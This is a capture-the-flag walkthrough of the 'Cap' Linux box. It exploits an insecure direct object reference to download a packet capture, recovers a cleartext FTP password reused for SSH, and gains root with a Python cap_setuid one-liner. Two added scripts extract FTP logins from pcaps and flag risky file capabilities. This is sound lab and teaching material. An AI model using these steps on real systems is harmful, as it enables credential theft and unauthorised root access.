Cap

Last updated 3 years ago

OS: Linux

Difficulty: Easy

Port Scanning

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack gunicorn

Checking out the website

The site is a network-monitoring dashboard (served by gunicorn, so the backend is a Python web app), and the page already shows it is logged in as a user named Nathan.

Checking out "Security Snapshot"

This option redirects us to /data/1, where no traffic is logged. The capture id is just a number in the URL and nothing ties it to our session, so I changed it to /data/0, and here we see that some traffic was recorded (a classic insecure direct object reference).

I clicked Download, got a file called 0.pcap and opened it in Wireshark.

User

In this file we can see a lot of useful information: HTTP requests to the site, some bare TCP traffic and, most importantly, an FTP session. FTP sends the login in cleartext, so Nathan's username and password for the FTP server are sitting in the capture.

Sorting the packets by protocol and scrolling to the end of the file (or applying the display filter ftp.request.command == "USER" || ftp.request.command == "PASS") we find this:

user: nathan

password: Buck3tH4TF0RM3!
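To see what Wireshark is doing for us here, the following added Python script (not code from the write-up or from the box) builds a small constructed pcap containing an FTP login like the one above, then parses it from the raw bytes: the pcap record headers, the Ethernet/IPv4/TCP headers, and finally the USER/PASS commands, paired per client-to-server stream. The IP addresses and port numbers in the sample are made up. It handles only the classic little-endian pcap format with Ethernet framing and refuses anything else rather than mis-parse it; a downloaded capture in that format can be passed to extract_ftp_logins the same way.

```python
import struct
from typing import Dict, Iterator, List, Tuple

PCAP_MAGIC = 0xA1B2C3D4      # classic pcap, little-endian, microsecond timestamps
LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6
FTP_PORT = 21


def _ip(addr: str) -> bytes:
    return bytes(int(o) for o in addr.split("."))


def build_frame(src: str, dst: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Minimal Ethernet/IPv4/TCP frame for the constructed sample.
    Checksums are left zero; the parser below never validates them."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, IPPROTO_TCP, 0,
                     _ip(src), _ip(dst))
    eth = b"\xaa" * 6 + b"\xbb" * 6 + struct.pack("!H", ETHERTYPE_IPV4)
    return eth + ip + tcp


def build_pcap(frames: List[bytes]) -> bytes:
    """Global header (24 bytes) followed by one 16-byte record header per frame."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1_620_000_000 + i, 0, len(frame), len(frame)) + frame
    return out


# Constructed sample (hypothetical addresses): a client browses the site, then
# logs in to FTP. The credentials are the ones recovered from the real capture.
CLIENT, SERVER = "10.0.0.5", "10.0.0.16"
SAMPLE_PCAP = build_pcap([
    build_frame(CLIENT, SERVER, 54321, 80, b"GET /data/0 HTTP/1.1\r\nHost: cap\r\n\r\n"),
    build_frame(SERVER, CLIENT, 21, 40001, b"220 (vsFTPd 3.0.3)\r\n"),
    build_frame(CLIENT, SERVER, 40001, 21, b"USER nathan\r\n"),
    build_frame(SERVER, CLIENT, 21, 40001, b"331 Please specify the password.\r\n"),
    build_frame(CLIENT, SERVER, 40001, 21, b"PASS Buck3tH4TF0RM3!\r\n"),
    build_frame(SERVER, CLIENT, 21, 40001, b"230 Login successful.\r\n"),
])


def tcp_segments(pcap: bytes) -> Iterator[Tuple[str, str, int, int, bytes]]:
    """Yield (src_ip, dst_ip, sport, dport, payload) for every TCP segment carrying data."""
    magic, _, _, _, _, _, linktype = struct.unpack_from("<IHHiIII", pcap, 0)
    if magic != PCAP_MAGIC or linktype != LINKTYPE_ETHERNET:
        raise ValueError("expected little-endian classic pcap with Ethernet frames")
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack_from("<IIII", pcap, off)
        off += 16
        frame = pcap[off:off + incl_len]
        off += incl_len
        if len(frame) < 34 or struct.unpack_from("!H", frame, 12)[0] != ETHERTYPE_IPV4:
            continue
        ihl = (frame[14] & 0x0F) * 4              # IPv4 header length incl. options
        total_len = struct.unpack_from("!H", frame, 16)[0]
        if frame[23] != IPPROTO_TCP or ihl < 20:
            continue
        src = ".".join(map(str, frame[26:30]))
        dst = ".".join(map(str, frame[30:34]))
        tcp = 14 + ihl
        if tcp + 20 > len(frame):
            continue
        sport, dport = struct.unpack_from("!HH", frame, tcp)
        data_off = (frame[tcp + 12] >> 4) * 4     # TCP header length incl. options
        payload = frame[tcp + data_off:14 + total_len]   # slice off any Ethernet padding
        if payload:
            yield src, dst, sport, dport, payload


def extract_ftp_logins(pcap: bytes) -> List[Dict[str, str]]:
    """Pair each USER with the PASS that follows it on the same client->server stream.
    Only segments sent *to* port 21 are inspected; server replies never carry the password."""
    pending: Dict[Tuple[str, int, str], str] = {}
    logins: List[Dict[str, str]] = []
    for src, dst, sport, dport, payload in tcp_segments(pcap):
        if dport != FTP_PORT:
            continue
        stream = (src, sport, dst)
        for line in payload.decode("latin-1").splitlines():
            verb, _, arg = line.partition(" ")
            if verb.upper() == "USER":
                pending[stream] = arg
            elif verb.upper() == "PASS" and stream in pending:
                logins.append({"client": src, "server": dst,
                               "user": pending.pop(stream), "password": arg})
    return logins


if __name__ == "__main__":
    with open("sample_ftp.pcap", "wb") as f:   # open this in Wireshark with the filter: ftp
        f.write(SAMPLE_PCAP)
    for login in extract_ftp_logins(SAMPLE_PCAP):
        print(f"{login['client']} -> {login['server']}: {login['user']} / {login['password']}")
```

Keying the pending USER on (client ip, client port, server ip) matters on a busier capture: two logins interleaved on different connections would otherwise get their passwords swapped.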

We can log in to the FTP server with these credentials and download the user flag:

ftp <box_ip>

get user.txt

The same password is reused for his system account, so we can also log in over SSH:

ssh nathan@<box_ip>

password: Buck3tH4TF0RM3!

Privesc

After some simple enumeration I saw that /var/www/html/app.py contains the line os.setuid(1000). An unprivileged process cannot normally call setuid(), so for the web app to work the Python interpreter must carry the CAP_SETUID file capability. That led me to list every binary on the box that has file capabilities:

nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

The cap_net_raw entries on ping and friends are Ubuntu defaults. The interesting one is python3.8, which carries cap_setuid with the flags +eip: effective and permitted (so it is active the moment the interpreter starts, no capset() call needed) and inheritable. CAP_SETUID places no limit on which uid you may switch to, so any user who can run python3 can setuid(0) and spawn a shell as root:

python3 -c 'import os;os.setuid(0);os.system("bash")'
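Before reaching for the one-liner it helps to know which lines of getcap output are actually worth attention. The following added Python script (not part of the write-up) parses getcap output in both the older "path = caps+flags" form shown above and the newer "path caps=flags" form, decodes each clause into capability names and their e/i/p flag letters, and reports the capabilities that are both permitted and effective and that lead to root on their own. The sample input is the real output from this box plus one constructed /usr/bin/tar line in the newer format; the HIGH_VALUE table is a summary of the usual GTFOBins/HackTricks list, not something the page states.

```python
import re
import sys
from typing import Dict, List, NamedTuple, Tuple

# Meaning of each letter in the flag set that follows '+' or '=' in getcap output.
FLAG_MEANING = {
    "e": "effective: active as soon as the program starts",
    "p": "permitted: the program may raise it with capset()",
    "i": "inheritable: kept across execve when the process also has it inheritable",
}

# Capabilities that by themselves give root or root-equivalent file access
# (summarised from GTFOBins / HackTricks; the reasons are notes, not exploit steps).
HIGH_VALUE = {
    "cap_setuid": "call setuid(0) and spawn a shell as root",
    "cap_setgid": "switch to any gid, e.g. the shadow group",
    "cap_dac_override": "bypass file read/write/execute permission checks",
    "cap_dac_read_search": "read any file and traverse any directory (/etc/shadow, root's keys)",
    "cap_chown": "take ownership of any file, e.g. /etc/passwd",
    "cap_fowner": "change the mode of any file, e.g. make /etc/passwd world-writable",
    "cap_sys_admin": "mount filesystems and many other administrative operations",
    "cap_sys_ptrace": "attach to root-owned processes and inject code",
    "cap_sys_module": "load kernel modules",
}


class FileCaps(NamedTuple):
    path: str
    caps: Dict[str, str]   # capability name -> flag letters, e.g. {"cap_setuid": "eip"}


# One clause: "name[,name...]" then '+' or '=' then zero or more of the letters e, i, p.
CLAUSE_RE = re.compile(r"^([a-z0-9_,]+)[+=]([eip]*)$")


def parse_getcap_line(line: str) -> FileCaps:
    """Accept both 'path = caps' (older getcap, as on this box) and 'path caps' (newer getcap)."""
    path, _, rest = line.strip().partition(" ")
    caps: Dict[str, str] = {}
    for clause in rest.lstrip("= ").split():
        m = CLAUSE_RE.match(clause)
        if not m:
            raise ValueError(f"unrecognised capability clause {clause!r} on {path}")
        names, flags = m.groups()
        for name in names.split(","):
            caps[name] = flags
    return FileCaps(path, caps)


def parse_getcap(output: str) -> List[FileCaps]:
    return [parse_getcap_line(line) for line in output.splitlines() if line.strip()]


def exploitable(entries: List[FileCaps]) -> List[Tuple[str, str, str]]:
    """(path, capability, why) for high-value capabilities that are both permitted and
    effective, i.e. usable without the program raising them itself. A capability with
    only +p would require the program to call capset() first; +i alone does nothing."""
    hits: List[Tuple[str, str, str]] = []
    for entry in entries:
        for name, flags in entry.caps.items():
            if name in HIGH_VALUE and "e" in flags and "p" in flags:
                hits.append((entry.path, name, HIGH_VALUE[name]))
    return hits


# The getcap output from this box, plus one constructed line (/usr/bin/tar) in the
# newer output format to show that both forms are parsed.
SAMPLE_GETCAP = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/tar cap_dac_read_search=ep
"""

if __name__ == "__main__":
    # Pipe real output in (getcap -r / 2>/dev/null | python3 caps.py) or run on the sample.
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_GETCAP
    for path, cap, why in exploitable(parse_getcap(text)):
        print(f"{path}: {cap} -> {why}")
```

On this box the only hit is python3.8 with cap_setuid; cap_net_bind_service and cap_net_raw let a program bind low ports and craft raw packets, which is useful for a web server or ping but does not get you root.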

Helpful links:

Web
  • portswigger
  • geeksforgeeks
  • owasp
  • hacktricks

User
  • hacktricks - wireshark
  • hacktricks - pentesting FTP

Privesc
  • hacktricks - linux privesc
  • GTFOBins - python